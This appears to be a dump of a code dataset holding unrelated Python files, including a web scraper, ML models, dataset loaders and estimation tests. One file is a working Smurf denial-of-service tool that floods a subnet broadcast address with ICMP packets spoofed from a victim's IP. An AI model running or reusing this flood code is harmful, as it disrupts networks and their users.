id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
192054 | <gh_stars>10-100
"""
=== Web Scraper for pulling environmental clearance data ===
The scraper cycles through every page on the start url
and builds a useable dataset. The website runs on ASP.net
so each page is reached using a form request and posting
javascript arguements.
USE:
* For scraping central data, set page 1 to url_a1 and
post to url_a2, and use the scrape_central function
* For scraping state data, set page 1 and post to url_b
and use the scrape_state function.
"""
# META
__author__ = "<NAME>"
__copyright__ = "Copyright 2016"
__version__ = "1.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
# Import Libraries
import requests
from bs4 import BeautifulSoup
import os
import pandas as pd
from scrape_functions import *
## Set Parameters
# Set Directory for Writing Data
# NOTE(review): `dir` shadows the Python built-in of the same name; harmless
# in this script but worth renaming if it grows.
dir = 'C:/Users/rmadhok/Dropbox (Personal)/EnvironmentalClearances/data'
# Set URLs to follow and scrape
url_a1 = 'http://environmentclearance.nic.in/gotosearch.aspx?pid=ECGranted' #Start url for central data
url_a2 = 'http://environmentclearance.nic.in/Search.aspx' #Post url for next page central data
url_b = 'http://environmentclearance.nic.in/onlinesearch_state_main.aspx?type=EC&status=1' #Start and post url for state data
# Initiate session object
# Persist header for validating next page call
s = requests.Session()
s.headers.update({'user-agent': 'Mozilla/5.0'})
# Initiate Master Data list
data = []
# Scrape Start Page
# --- FOR CENTRAL DATA use url_a1
# --- FOR STATE DATA use url_b
print 'Scraping Page: ' + str(1) + '...'
#r = s.get(url_a1)
r = s.get(url_b)
data += scrape_state(r.content)
# Get Form Data for Page 1
# ASP.NET paging requires echoing the hidden __VIEWSTATE /
# __VIEWSTATEGENERATOR / __EVENTVALIDATION fields of the *current* page
# back in the next POST, so they are re-extracted after every request.
VIEWSTATE, GENERATOR, VALIDATION = getFormData(r.content)
# Scrape All Pages
# --- FOR CENTRAL DATA post to url_a2
# --- FOR STATE DATA post to url_b
lastPage = 320
for page in range(2, lastPage):
    try:
        print "Scraping Page: " + str(page) + "..."
        # Use form data from current page to get next page data
        r = s.post(
            url_b,
            data={
                'ww': 'rr|GridView1',
                'a': 'rb2',
                #'a': 'rb1',
                'ddlstatus': 'EC',
                #'ddlstatus': 'UPEChome',
                'ddlyear': '-All Years-',
                'ddlcategory': '-All Category-',
                'ddlstate': '-All State-',
                'textbox2': '',
                #'DropDownList1': 'UPEC',
                #'__ASYNCPOST': 'true',
                '__EVENTTARGET': 'GridView1',
                '__EVENTARGUMENT': 'Page${}'.format(page),
                '__VIEWSTATE': VIEWSTATE,
                '__VIEWSTATEGENERATOR': GENERATOR,
                '__EVENTVALIDATION': VALIDATION,
                '__LASTFOCUS': ''
            }
        )
        # Add page data to master
        data += scrape_state(r.content)
        # Get Current page Form Data
        VIEWSTATE, GENERATOR, VALIDATION = getFormData(r.content)
    # Exit loop when reach last page
    # NOTE(review): this bare except also swallows network errors and
    # KeyboardInterrupt; catching the specific parse failure would be safer.
    except:
        print "Reached last page."
        break
# Write to CSV
os.chdir(dir)
data_full = pd.DataFrame(data)
data_full.to_csv('ec_state.csv', encoding = 'utf-8')
| StarcoderdataPython |
1692439 | """Contains the Monte Carlo simulation tests."""
import numpy as np
import copy
from trempy.estimate.estimate_auxiliary import estimate_cleanup
from trempy.shared.shared_auxiliary import print_init_dict
from trempy.config_trempy import PREFERENCE_PARAMETERS
from trempy.tests.test_auxiliary import random_dict
from trempy.custom_exceptions import TrempyError
from trempy.config_trempy import DEFAULT_BOUNDS
from trempy.read.read import ESTIMATION_GROUP
from trempy.estimate.estimate import estimate
from trempy.simulate.simulate import simulate
from trempy.config_trempy import SMALL_FLOAT
from trempy.read.read import read
def basic_dict(version, fname, optimizer, maxfun, num_agents, std=None,
               eps=None, ftol=None, gtol=None):
    """Generate basic dictionary for Monte Carlo Simulations.

    Draws a random init dictionary constrained to the given version,
    optimizer and sample size, then applies caller-supplied question
    standard deviations and optimizer tolerances (with sensible defaults).
    """
    constr = {
        'version': version, 'fname': fname, 'num_agents': num_agents,
        'maxfun': maxfun, 'optimizer': optimizer, 'all_questions': True,
    }
    init_dict = random_dict(constr)

    # Override the per-question standard deviations requested by the caller.
    if std is not None:
        for question, deviation in std.items():
            init_dict['QUESTIONS'][question][0] = deviation

    # Fall back to default tolerances when none were supplied.
    nuisance_paras = {
        'eps': 1e-05 if eps is None else eps,
        'ftol': 1e-08 if ftol is None else ftol,
        'gtol': 1e-08 if gtol is None else gtol,
    }
    # Only touch the options the selected optimizer actually exposes.
    for label, value in nuisance_paras.items():
        if label in init_dict[optimizer]:
            init_dict[optimizer][label] = value
    return init_dict
def set_questions(init_dict, is_fixed, std=None):
    """Adjust question parameters in-place.

    ``is_fixed`` is either the string ``'fix_all'`` (freeze every question)
    or a per-question sequence of booleans; ``std`` optionally supplies a
    per-question sequence of standard deviations.
    """
    questions = init_dict['QUESTIONS']

    # Change free and fixed status.
    if is_fixed == 'fix_all':
        for key in questions:
            questions[key][1] = True
    else:
        np.testing.assert_equal(len(is_fixed), len(questions.keys()))
        for idx, flag in enumerate(is_fixed):
            questions[idx][1] = flag

    # Change standard deviations.
    if std is not None:
        np.testing.assert_equal(len(std), len(questions.keys()))
        for idx, deviation in enumerate(std):
            questions[idx][0] = deviation
def remove_cutoffs(init_dict):
    """Remove all cutoff information from *init_dict* in-place.

    Returns the modified dictionary.  (The original implementation
    mistakenly returned the builtin ``dict`` type instead of the
    dictionary it had just modified.)
    """
    init_dict['CUTOFFS'] = dict()
    return init_dict
def estimate_at_truth(fix_question_paras):
    """Stability of the likelihood at the truth.

    Simulates a dataset at the true parameters, re-estimates starting from
    those same values, and reports truth vs. estimate for every free
    parameter.  Returns a list of
    ``[seed, fval, criterion, key, start_value, estimated_value]`` rows.
    """
    estimate_cleanup()
    init_dict = basic_dict(version='nonstationary', optimizer='SCIPY-L-BFGS-B', fname='truth',
                           num_agents=2000, maxfun=1000)
    set_questions(init_dict, is_fixed=fix_question_paras, std=None)
    seed = init_dict['SIMULATION']['seed']
    version = init_dict['VERSION']['version']
    print_init_dict(init_dict, fname='truth.trempy.ini')
    # Simulate at the truth, then start estimation from the truth as well.
    _, fval = simulate('truth.trempy.ini')
    est_output = estimate('truth.trempy.ini')
    # Print output
    estimated_dict = read('stop/stop.trempy.ini')
    results = list()
    for group in ESTIMATION_GROUP[version]:
        for key in init_dict[group].keys():
            start_value, is_fixed, _ = init_dict[group][key]
            estimated_value = estimated_dict[group][key][0]
            # Skip unused (None) and fixed parameters.
            if start_value is None or is_fixed is True:
                continue
            results.append([seed, fval, est_output[0], key, start_value, estimated_value])
            print('{0:<25} {1:<15}'.format('Parameter:', key))
            print('-------------------------')
            print('{0:<25} {1:5.4f}'.format('Truth:', start_value))
            print('{0:<25} {1:5.4f}'.format('Estimated value:', estimated_value))
            print(' ------------------------- ')
    # NOTE(review): indentation was reconstructed; the seed/fval summary is
    # assumed to print once after the loop -- confirm against upstream.
    print('sim seed: {:>25}'.format(seed))
    print('fval at truth: {:>25}'.format(fval))
    print(' ------------------------- ')
    return results
def perturbate_econ(init_dict, no_temporal_choices=True, max_dist=None):
    """Perturbate all economic parameters and set bounds to default bounds.

    Returns a deep copy of the pre-perturbation dictionary (with bounds
    reset to the defaults) alongside the perturbed dictionary.
    """
    old_dict = copy.deepcopy(init_dict)
    version = init_dict['VERSION']['version']

    for group in ESTIMATION_GROUP[version]:
        group_dict = init_dict[group]
        for label in PREFERENCE_PARAMETERS[version]:
            if label not in group_dict.keys():
                continue
            value, is_fixed, _ = group_dict[label]
            # Optional / unused parameters are stored as None and skipped.
            if value is None:
                continue
            lower, upper = DEFAULT_BOUNDS[label]

            # NOTE: the random draw happens unconditionally so the RNG
            # stream is identical regardless of the temporal handling below.
            if max_dist is None:
                new_value = np.random.uniform(lower, upper)
            else:
                # Move less than max_dist away, clipped to the bounds.
                new_value = np.random.uniform(value - max_dist, value + max_dist)
                new_value = max(lower, min(upper, new_value))

            if no_temporal_choices is True and group in ['DISCOUNTING']:
                # Temporal parameters stay fixed at their true values.
                is_fixed, new_value = True, value
            else:
                is_fixed = False

            old_dict[group][label] = [value, is_fixed, [lower, upper]]
            group_dict[label] = [new_value, is_fixed, [lower, upper]]

    return old_dict, init_dict
def pertubation_robustness_all(version, no_temporal_choices=True,
                               max_dist=None, set_std_to=None):
    """Test pertubation of all parameters.

    Simulates data at the truth, perturbs every free economic parameter,
    re-estimates from the perturbed values, and prints truth vs. perturbed
    vs. estimated for each parameter.
    """
    # Get random init file
    estimate_cleanup()
    init_dict = basic_dict(version=version, optimizer='SCIPY-L-BFGS-B', fname='truth',
                           num_agents=2000, maxfun=1000)
    # Set variance for questions
    if set_std_to is not None:
        for q in init_dict['QUESTIONS'].keys():
            init_dict['QUESTIONS'][q][0] = set_std_to
            # Pin the bounds tightly around the fixed value.
            init_dict['QUESTIONS'][q][2] = [set_std_to - SMALL_FLOAT, set_std_to + SMALL_FLOAT]
    set_questions(init_dict, is_fixed='fix_all', std=None)
    seed = init_dict['SIMULATION']['seed']
    version = init_dict['VERSION']['version']
    print_init_dict(init_dict, fname='truth.trempy.ini')
    # Perturb parameters
    truth_dict, perturbed_dict = perturbate_econ(
        init_dict, no_temporal_choices=no_temporal_choices, max_dist=max_dist)
    print_init_dict(perturbed_dict, fname='perturbed.trempy.ini')
    # Simulate data from init file and report criterion function.
    _, fval = simulate('truth.trempy.ini')
    print('fval at truth: {:>25}'.format(fval))
    # Estimate starting from perturbed values
    estimate('perturbed.trempy.ini')
    estimated_dict = read('stop/stop.trempy.ini')
    for group in ESTIMATION_GROUP[version]:
        for key in init_dict[group].keys():
            start_value, is_fixed, bounds = truth_dict[group][key]
            perturbed_value = perturbed_dict[group][key][0]
            estimated_value = estimated_dict[group][key][0]
            # Skip unused (None) and fixed parameters.
            if start_value is None or is_fixed is True:
                continue
            print('{0:<25} {1:<15}'.format('Parameter:', key))
            print('-------------------------')
            print('{0:<25} {1:5.4f}'.format('Start:', start_value))
            print('{0:<25} {1:5.4f}'.format('Perturbated value:', perturbed_value))
            print('{0:<25} {1:5.4f}'.format('Estimated value:', estimated_value))
    # NOTE(review): indentation was reconstructed; the seed/fval footer is
    # assumed to print once after the loop -- confirm against upstream.
    print('Seed: {:>25}'.format(seed))
    print('fval_truth: {:>25}'.format(fval))
def perturbate_single(init_dict, label, value=None):
    """Perturbate a single parameter and fix all other parameters for estimation.

    The bounds of the perturbed parameter are reset to their default bounds,
    which increases the scope for perturbations.
    """
    old_dict = copy.deepcopy(init_dict)
    version = init_dict['VERSION']['version']
    if label not in PREFERENCE_PARAMETERS[version]:
        raise TrempyError('Version {0} has no parameters {1}'.format(version, label))

    # Freeze the standard deviation of every question.
    for question in init_dict['QUESTIONS'].keys():
        init_dict['QUESTIONS'][question][1] = True

    # Optional parameters may only be perturbed when they are actually used.
    if label.startswith('unrestricted_weights'):
        if None in init_dict['TEMPORAL'].values():
            raise TrempyError('Cannot set value for unused argument: {}.'.format(label))

    # Fix every parameter except the perturbed one, which is "un-fixed".
    for group in ESTIMATION_GROUP[version]:
        for key in init_dict[group].keys():
            current_value, _, bounds = init_dict[group][key]
            if key != label:
                init_dict[group][key] = [current_value, True, bounds]
                continue
            # Reset bounds of the target parameter to their defaults.
            lower, upper = DEFAULT_BOUNDS[label]
            if value is None:
                # Draw a value strictly inside the default bounds.
                value = np.random.uniform(lower + SMALL_FLOAT, upper - SMALL_FLOAT)
            init_dict[group][key] = [value, False, [lower, upper]]
            # Mirror the relaxed bounds in the pre-perturbation dict too.
            old_dict[group][key] = [current_value, False, [lower, upper]]

    return old_dict, init_dict
def pertubation_robustness_single(version, label=None, value=None, num_agents=None, maxfun=None,
                                  optimizer='SCIPY-BFGS'):
    """Check robustness against single perturbations.

    Perturbs one parameter (random if *label* is None), fixes everything
    else, re-estimates, and prints start vs. perturbed vs. estimated value.
    """
    if label is None:
        label = np.random.choice(PREFERENCE_PARAMETERS[version])
    # Get random init file
    constr = {'version': version, 'fname': 'perturb.start'}
    if num_agents is not None:
        constr['num_agents'] = num_agents
    if maxfun is None:
        constr['maxfun'] = 50
    else:
        constr['maxfun'] = maxfun
    init_dict = random_dict(constr)
    # Tighten the optimizer options for a quick, reproducible run.
    init_dict['ESTIMATION']['optimizer'] = optimizer
    init_dict['SCIPY-POWELL']['ftol'] = 0.1
    init_dict['SCIPY-POWELL']['xtol'] = 0.01
    init_dict['SCIPY-BFGS']['eps'] = 1.4901161193847656e-08
    init_dict['SCIPY-BFGS']['gtol'] = 1e-05
    init_dict['SCIPY-L-BFGS-B']['eps'] = 1.4901161193847656e-08
    init_dict['SCIPY-L-BFGS-B']['gtol'] = 1.5e-08
    init_dict['SCIPY-L-BFGS-B']['ftol'] = 1.5e-08
    # Perturb parameters
    old_dict, perturbated = perturbate_single(init_dict, label=label, value=value)
    # Save dicts
    print_init_dict(old_dict, 'perturb.start')
    print_init_dict(perturbated, 'perturb.end')
    # Simulate data from init file
    simulate('perturb.start')
    # Estimate starting from perturbed values
    estimate('perturb.end')
    # os.chdir('stop')
    estimated_dict = read('stop/stop.trempy.ini')
    # os.chdir('../')
    for group in ESTIMATION_GROUP[version]:
        for key in init_dict[group].keys():
            if key == label:
                start_value = old_dict[group][key][0]
                perturbed_value = perturbated[group][key][0]
                estimated_value = estimated_dict[group][key][0]
                print('{0:<25} {1:<15}'.format('Parameter:', label))
                print('-------------------------')
                print('{0:<25} {1:5.4f}'.format('Start:', start_value))
                print('{0:<25} {1:5.4f}'.format('Perturbated value:', perturbed_value))
                print('{0:<25} {1:5.4f}'.format('Estimated value:', estimated_value))
| StarcoderdataPython |
3298533 | from __future__ import absolute_import, print_function, division
import os
import glob
import numpy as np
import six
class NfS(object):
    """`NfS <http://ci2cv.net/nfs/index.html>`_ Dataset.

    Publication:
        ``Need for Speed: A Benchmark for Higher Frame Rate Object Tracking``,
        <NAME>, <NAME>, <NAME>, <NAME> and <NAME>, ICCV 2017.

    Args:
        root_dir (string): Root directory of dataset where sequence
            folders exist.
        fps (integer): Sequence frame rate. Two options ``30`` and ``240``
            are available. Default is 240.
    """

    def __init__(self, root_dir, fps=240):
        super(NfS, self).__init__()
        assert fps in [30, 240]
        self.fps = fps
        self.root_dir = root_dir
        self._check_integrity(root_dir)
        # One annotation .txt per sequence, stored under <sequence>/<fps>/.
        self.anno_files = sorted(
            glob.glob(os.path.join(root_dir, '*/%d/*.txt' % fps)))
        # Sequence name = annotation filename without the '.txt' suffix.
        self.seq_names = [os.path.basename(f)[:-4] for f in self.anno_files]
        self.seq_dirs = [
            os.path.join(os.path.dirname(f), n)
            for f, n in zip(self.anno_files, self.seq_names)
        ]

    def __getitem__(self, index):
        r"""
        Args:
            index (integer or string): Index or name of a sequence.

        Returns:
            tuple: (img_files, anno), where ``img_files`` is a list of
                file names and ``anno`` is a N x 4 (rectangles) numpy array.
        """
        # Accept a sequence name as well as an integer index.
        if isinstance(index, six.string_types):
            if not index in self.seq_names:
                raise Exception('Sequence {} not found.'.format(index))
            index = self.seq_names.index(index)
        img_files = sorted(
            glob.glob(os.path.join(self.seq_dirs[index], '*.jpg')))
        anno = np.loadtxt(self.anno_files[index], dtype=str)
        anno = anno[:, 1:5].astype(float)  # [left, top, right, bottom]
        anno[:, 2:] -= anno[:, :2]  # [left, top, width, height]
        # handle inconsistent lengths
        # NOTE(review): when there are ~8x more annotations than frames the
        # 240 fps labels are presumably paired with 30 fps frames, so every
        # 8th row is kept -- confirm against the dataset layout.
        if not len(img_files) == len(anno):
            if abs(len(anno) / len(img_files) - 8) < 1:
                anno = anno[0::8, :]
            # Off-by-one mismatches: truncate both lists to the shorter one.
            diff = abs(len(img_files) - len(anno))
            if diff > 0 and diff <= 1:
                n = min(len(img_files), len(anno))
                anno = anno[:n]
                img_files = img_files[:n]
        assert len(img_files) == len(anno)
        return img_files, anno

    def __len__(self):
        # Number of sequences in the dataset.
        return len(self.seq_names)

    def _check_integrity(self, root_dir):
        """Verify the dataset directory exists and warn on missing sequences."""
        seq_names = os.listdir(root_dir)
        # Ignore hidden entries such as '.DS_Store'.
        seq_names = [n for n in seq_names if not n[0] == '.']
        if os.path.isdir(root_dir) and len(seq_names) > 0:
            # check each sequence folder
            for seq_name in seq_names:
                seq_dir = os.path.join(root_dir, seq_name)
                if not os.path.isdir(seq_dir):
                    print('Warning: sequence %s not exists.' % seq_name)
        else:
            # dataset not exists
            raise Exception('Dataset not found or corrupted.')
| StarcoderdataPython |
# Enable Flask debug mode (development only -- disable in production).
DEBUG = True
# Database
# SQLAlchemy connection string layout:
#   "driver://user:password@host:port/database?charset"
SQLALCHEMY_DATABASE_URI = "mysql://root:root@localhost:5000/dbjangoDB"
SQLALCHEMY_TRACK_MODIFICATIONS = True
| StarcoderdataPython |
12827031 | <gh_stars>0
from netaddr import IPNetwork
from scapy.all import ICMP, IP, send
from netattacker.attacker import AttackerBaseClass
class Smurf(AttackerBaseClass):
    """Smurf (ICMP amplification) attacker.

    Floods the victim by looping ICMP echo requests to the subnet broadcast
    address with the victim's IP spoofed as the source.

    Parameters
    ----------
    target : str
        The target's hostname or IP address
    subnet_mask : str
        The subnet's CIDR prefix (eg., 24)

    Methods
    -------
    compute_broadcast_addr()
        Returns the broadcast address of the target subnet
    print_broadcast_addr()
        Prints the broadcast address of the target subnet
    start()
        Sends spoofed ICMP packets to the target broadcast address
    """

    def __init__(self, target: str, subnet_mask: str):
        """
        Parameters
        ----------
        target : str
            The target's hostname or IP address
        subnet_mask : str
            The subnet's CIDR prefix (eg., 24)
        """
        super().__init__(target, attack="SMURF")
        self.broadcast_ipv4 = self.compute_broadcast_addr(subnet_mask)

    def compute_broadcast_addr(self, subnet_mask: str) -> str:
        """Returns the broadcast address of the target subnet"""
        network = IPNetwork(self.target_ipv4 + "/" + subnet_mask)
        return str(network.broadcast)

    def print_broadcast_addr(self):
        """Prints the broadcast address of the target subnet"""
        message = "[*] The target broadcast address: {}".format(self.broadcast_ipv4)
        print(message)

    def start(self):
        """Sends spoofed ICMP packets to the target broadcast address"""
        packet = IP(src=self.target_ipv4, dst=self.broadcast_ipv4) / ICMP()
        print("[*] SMURF attack started")
        # loop=True: keep sending until interrupted.
        send(packet, verbose=False, loop=True)
def main():
    """Demo entry point: smurf-attack a hard-coded LAN target on a /24."""
    a = Smurf("192.168.1.2", "24")
    a.print_broadcast_addr()
    a.print_target_ip()
    a.start()


if __name__ == "__main__":
    main()
4998191 | # -*- coding: utf-8 -*-
import os
import uuid
from fast_ani_output import create_html_tables
from DataFileUtil.DataFileUtilClient import DataFileUtil
from KBaseReport.KBaseReportClient import KBaseReport
# This module handles creating a KBase report object from fast_ani_output html
def create_report(callback_url, scratch, workspace_name, result_data):
    """Create a KBase extended report object for the FastANI HTML output.

    Renders the result tables to HTML, collects any per-result visualization
    files into a scratch directory, zips that directory into Shock, and
    registers an extended report in the given workspace.  Returns a dict
    with ``report_name`` and ``report_ref``.
    """
    html = create_html_tables(result_data)
    dfu = DataFileUtil(callback_url)
    report_name = 'fastANI_report_' + str(uuid.uuid4())
    report_client = KBaseReport(callback_url)
    html_dir = os.path.join(scratch, report_name)
    os.mkdir(html_dir)
    # Move every generated visualization next to the HTML index so the
    # zipped archive is self-contained.
    for result in result_data:
        if os.path.exists(result['viz_path']):
            destination = os.path.join(html_dir, result['viz_filename'])
            os.rename(result['viz_path'], destination)
    index_path = os.path.join(html_dir, "index.html")
    with open(index_path, 'w') as handle:
        handle.write(html)
    shock = dfu.file_to_shock({
        'file_path': html_dir,
        'make_handle': 0,
        'pack': 'zip',
    })
    html_file = {
        'shock_id': shock['shock_id'],
        'name': 'index.html',
        'label': 'html_files',
        'description': 'FastANI HTML report',
    }
    report = report_client.create_extended_report({
        'direct_html_link_index': 0,
        'html_links': [html_file],
        'report_object_name': report_name,
        'workspace_name': workspace_name,
    })
    return {'report_name': report['name'], 'report_ref': report['ref']}
| StarcoderdataPython |
3322458 | import numpy as np
try:
import dgl
import torch.nn as nn
import torch.nn.functional as F
from dgl.nn.pytorch import GraphConv
except ImportError:
pass
from photonai_graph.NeuralNets.dgl_base import DGLRegressorBaseModel, DGLClassifierBaseModel
class GCNClassifier(nn.Module):
    """Graph classifier built from stacked GCN layers (Kipf & Welling, 2017).

    Node in-degrees serve as the initial node features; the graph-level
    readout is a mean over node embeddings followed by a linear head.
    """

    def __init__(self, in_dim, hidden_dim, n_classes, hidden_layers, allow_zero_in_degree):
        super(GCNClassifier, self).__init__()
        # Input layer followed by (hidden_layers - 1) hidden convolutions.
        convs = [GraphConv(in_dim, hidden_dim, allow_zero_in_degree=allow_zero_in_degree)]
        convs += [
            GraphConv(hidden_dim, hidden_dim, allow_zero_in_degree=allow_zero_in_degree)
            for _ in range(1, hidden_layers)
        ]
        self.layers = nn.ModuleList(convs)
        self.classify = nn.Linear(hidden_dim, n_classes)

    def forward(self, g):
        # The in-degree doubles as the initial node feature; for undirected
        # graphs this equals the out-degree.
        h = g.in_degrees().view(-1, 1).float()
        # Graph convolutions with ReLU activations.
        for conv in self.layers:
            h = F.relu(conv(g, h))
        g.ndata['h'] = h
        # Mean over node representations yields the graph embedding.
        hg = dgl.mean_nodes(g, 'h')
        return self.classify(hg)
class GCNClassifierModel(DGLClassifierBaseModel):
    def __init__(self,
                 in_dim: int = 1,
                 hidden_layers: int = 2,
                 hidden_dim: int = 256,
                 nn_epochs: int = 200,
                 learning_rate: float = 0.001,
                 batch_size: int = 32,
                 adjacency_axis: int = 0,
                 feature_axis: int = 1,
                 add_self_loops: bool = True,
                 allow_zero_in_degree: bool = False,
                 logs: str = ''):
        """
        Graph Convolutional Network for graph classification. GCN layers
        from Kipf & Welling, 2017. Implementation based on dgl & pytorch.

        Parameters
        ----------
        in_dim: int,default=1
            input dimension
        hidden_layers: int,default=2
            number of hidden layers used by the model
        hidden_dim: int,default=256
            dimensions in the hidden layers
        """
        base_kwargs = dict(nn_epochs=nn_epochs,
                           learning_rate=learning_rate,
                           batch_size=batch_size,
                           adjacency_axis=adjacency_axis,
                           feature_axis=feature_axis,
                           add_self_loops=add_self_loops,
                           allow_zero_in_degree=allow_zero_in_degree,
                           logs=logs)
        super(GCNClassifierModel, self).__init__(**base_kwargs)
        self.in_dim = in_dim
        self.hidden_dim = hidden_dim
        self.hidden_layers = hidden_layers

    def _init_model(self, X=None, y=None):
        # One output unit per distinct class label observed in y.
        n_classes = len(np.unique(y))
        self.model = GCNClassifier(self.in_dim,
                                   self.hidden_dim,
                                   n_classes,
                                   self.hidden_layers,
                                   allow_zero_in_degree=self.allow_zero_in_degree)
class GCNRegressorModel(DGLRegressorBaseModel):
    def __init__(self,
                 in_dim: int = 1,
                 hidden_layers: int = 2,
                 hidden_dim: int = 256,
                 nn_epochs: int = 200,
                 learning_rate: float = 0.001,
                 batch_size: int = 32,
                 adjacency_axis: int = 0,
                 feature_axis: int = 1,
                 add_self_loops: bool = True,
                 allow_zero_in_degree: bool = False,
                 logs: str = ''):
        """
        Graph convolutional Network for graph regression. GCN Layers
        from Kipf & Welling, 2017. Implementation based on dgl & pytorch.

        Parameters
        ----------
        in_dim: int,default=1
            input dimension
        hidden_layers: int,default=2
            number of hidden layers used by the model
        hidden_dim: int,default=256
            dimensions in the hidden layers
        """
        base_kwargs = dict(nn_epochs=nn_epochs,
                           learning_rate=learning_rate,
                           batch_size=batch_size,
                           adjacency_axis=adjacency_axis,
                           feature_axis=feature_axis,
                           add_self_loops=add_self_loops,
                           allow_zero_in_degree=allow_zero_in_degree,
                           logs=logs)
        super(GCNRegressorModel, self).__init__(**base_kwargs)
        self.in_dim = in_dim
        self.hidden_dim = hidden_dim
        self.hidden_layers = hidden_layers

    def _init_model(self, X=None, y=None):
        # Reuse the classifier architecture with a single output unit as the
        # regression head (the final Linear layer has no activation); cast
        # the parameters to float32.
        network = GCNClassifier(self.in_dim,
                                self.hidden_dim,
                                1,
                                self.hidden_layers,
                                allow_zero_in_degree=self.allow_zero_in_degree)
        self.model = network.float()
| StarcoderdataPython |
6475711 | <reponame>cliche-niche/model-zoo
import tensorflow as tf
import numpy as np
from tensorflow.keras import layers
from tensorflow.keras import activations
from tensorflow.keras import regularizers
from stage import stage
class repvgg(tf.keras.Model):
    """RepVGG-style image classifier (defaults: A0 configuration, CIFAR-10)."""

    def __init__(self, a=0.75, b=2.5, l=[1, 2, 4, 14, 1], nc=10):
        # default A0 architecture training on CIFAR-10 dataset
        # NOTE(review): mutable default `l` is shared across instances; safe
        # only as long as it is never mutated.
        super(repvgg, self).__init__()
        """
        a:= Same purpose as that in paper, used for number of channels
        b:= Same purpose as that in paper, used for number of channels
        l:= The number of layers per stage
        nc:= The total number of classifications of dataset
        Model consists of a layer for augmentation, followed by 5 stages, and by a
        Global Average Pooling layer and a fully connected layer
        """
        # Training-time augmentation: random 32x32 crop plus random flips.
        self.aug = tf.keras.Sequential(
            [
                layers.experimental.preprocessing.RandomCrop(32, 32),
                layers.experimental.preprocessing.RandomFlip("horizontal_and_vertical"),
            ]
        )
        self.st = []
        self.l = l
        # Channel widths per stage: scaled by `a` for stages 0-3 (capped at
        # 64 for stage 0) and by `b` for the final stage, as in the paper.
        self.f = [min(64, 64 * a), 64 * a, 128 * a, 256 * a, 512 * b]
        for i in range(5):
            self.st.append(stage(self.f[i], l[i]))
        self.gap = layers.GlobalAveragePooling2D()
        self.end = layers.Dense(
            units=nc, activation="softmax", kernel_regularizer=regularizers.l2(1e-4)
        )

    def call(self, inp):
        # Augment, run the five stages, then pool and classify.
        x = self.aug(inp)
        for i in range(5):
            x = self.st[i](x)
        x = self.gap(x)
        x = self.end(x)
        return x

    def model(self, inp):
        # Can be used for printing model summary
        x = layers.Input(shape=inp[0].shape)
        return tf.keras.Model(inputs=x, outputs=self.call(x))

    def repara(self):
        # NOTE(review): delegates to stage.repara(); presumably fuses the
        # RepVGG branches for inference -- confirm in the `stage` module.
        for i in range(5):
            self.st[i].repara()
        return
| StarcoderdataPython |
9626929 | import os
from torchvision import transforms
import mask_utils.transforms as T
def parse_config(path):
    """Read a label file (one class name per line) into a name -> id mapping.

    IDs start at 1; names are stripped of surrounding whitespace and
    lower-cased.  The file must exist and contain at least one line.
    """
    assert os.path.exists(path)
    with open(path, "r") as handle:
        names = [line.strip().lower() for line in handle.readlines()]
    class_to_ids = {name: idx + 1 for idx, name in enumerate(names)}
    assert len(class_to_ids) >= 1
    return class_to_ids
def collate_fn(batch):
    """Transpose a batch of (input, target) pairs into (inputs, targets)."""
    transposed = zip(*batch)
    return tuple(transposed)
def get_transform(model, train):
    """Build the preprocessing pipeline for the requested model.

    Mask R-CNN uses the project transforms (tensor conversion plus a random
    horizontal flip during training); every other model gets a torchvision
    resize-to-1024 + tensor pipeline (``train`` is ignored in that case).
    """
    if model.lower() == "maskrcnn":
        steps = [T.ToTensor()]
        if train:
            # Augment only the training split.
            steps.append(T.RandomHorizontalFlip(0.5))
        return T.Compose(steps)
    preprocess = transforms.Compose([
        transforms.Resize((1024, 1024)),
        transforms.ToTensor(),
    ])
    return preprocess
| StarcoderdataPython |
11217396 | <filename>pinn/losses.py
import numpy as np
np.random.seed(0)
class BinaryCrossEntropy:
    """Binary cross-entropy loss for probabilistic binary classifiers.

    Expects ``y`` (targets in {0, 1}) and ``y_pred`` (predicted
    probabilities strictly inside (0, 1)) as numpy arrays of equal shape;
    both the loss and its derivative are averaged over the first axis.
    """

    def __init__(self):
        pass

    def derivative(self, y, y_pred):
        """Gradient of the mean BCE loss with respect to ``y_pred``.

        d/dp [-(y*log(p) + (1-y)*log(1-p))] = -(y/p - (1-y)/(1-p)).
        The original implementation used '+' between the two terms, which
        gives the wrong sign on the negative-class contribution.
        """
        return -(y / y_pred - (1 - y) / (1 - y_pred)) / y.shape[0]

    def loss(self, y, y_pred):
        """Mean binary cross-entropy: -mean(y*log(p) + (1-y)*log(1-p)).

        The original implementation used log(1 - y_pred) for the
        positive-class term; the correct factor is log(y_pred).
        """
        return -np.sum(y * np.log(y_pred) + (1 - y) * np.log(1 - y_pred)) / y.shape[0]
| StarcoderdataPython |
4876096 | from distutils.core import setup
# Pull the long description from the README so package indexes can show it.
with open("README.md", "r") as fh:
    long_description = fh.read()

setup(
    name="etoro_edavki",
    version="1.0.0",
    py_modules=["etoro_edavki"],
    python_requires=">=3",
    entry_points={
        "console_scripts": ["etoro_edavki=etoro_edavki:main", "etoro-edavki=etoro_edavki:main"]
    },
    author="<NAME>",
    # Fix: long_description was read from README.md but never passed in.
    long_description=long_description,
)
| StarcoderdataPython |
1829383 | <filename>neutron/tests/unit/cisco/test_network_db.py
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import mock
import testtools
from neutron.db import api as db
from neutron.plugins.cisco.common import cisco_constants
from neutron.plugins.cisco.common import cisco_credentials_v2
from neutron.plugins.cisco.common import cisco_exceptions as c_exc
from neutron.plugins.cisco.common import config as config
from neutron.plugins.cisco.db import network_db_v2 as cdb
from neutron.plugins.cisco import network_plugin
from neutron.tests import base
class CiscoNetworkDbTest(base.BaseTestCase):
    """Base class for Cisco network database unit tests."""

    def setUp(self):
        """Configure a fresh database and a plugin with its init mocked out."""
        super(CiscoNetworkDbTest, self).setUp()
        db.configure_db()

        # The Cisco network plugin includes a thin layer of QoS and
        # credential API methods which indirectly call Cisco QoS and
